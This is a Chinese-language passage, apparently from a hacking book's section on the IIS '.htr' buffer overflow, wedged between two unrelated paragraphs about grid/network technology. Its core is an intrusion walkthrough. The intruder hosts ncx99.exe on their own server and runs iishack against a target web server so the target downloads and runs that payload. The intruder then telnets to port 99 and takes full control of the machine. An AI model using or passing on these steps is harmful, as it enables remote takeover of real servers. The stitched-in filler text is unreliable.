網絡技術是從1990年代中期發展起來的新技術，它把互聯網上分散的資源融為有機整體，實現資源的全面共享和有機協作，使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享，網絡則被認為是互聯網發展的第三階段。

6.6 htr溢出入侵

    

6.6  htr溢出入侵

在IIS的Inetsrv目錄下，有個DLL文件叫ism.dll，這個模塊在Web運行的時候就被加載到較高的內存地址，并且導致了零字節問題到處出現。IIShack.asm利用這個漏洞，eEye寫了兩個程序：iishack.exe和ncx99.exe。

在命令提示符下運行iishack程序，如圖6-60所示。

圖6-60  iishack運行界面

命令行運行格式：

iishack 目標主機 端口URL(ncx99鏈接路徑)

入侵者必須自己有一個空間，把ncx99.exe上傳到該空間下，比如入侵者將ncx99.exe上傳的路徑是：61.129.81.122/ls-net/ncx99.exe，而對方的IIS server是sh.kill.com.cn，則輸入如下內容：

iishack sh.kill.com.cn 80 61.129.81.122/ls-net/ncx99.exe

如圖6-61所示。

注意：

在輸入ncx99.exe路徑時不帶http://。

圖6-61  htr溢出

接著在提示符下輸入：telnet sh.kill.com.cn 99即可通過99號端口登錄到對方服務器。這樣，入侵者就可以完全控制目標計算機。

網絡的神奇作用吸引著越來越多的用戶加入其中，正因如此，網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......，各項技術都需要適時應勢，對應發展，這正是網絡迅速走向進步的催化劑。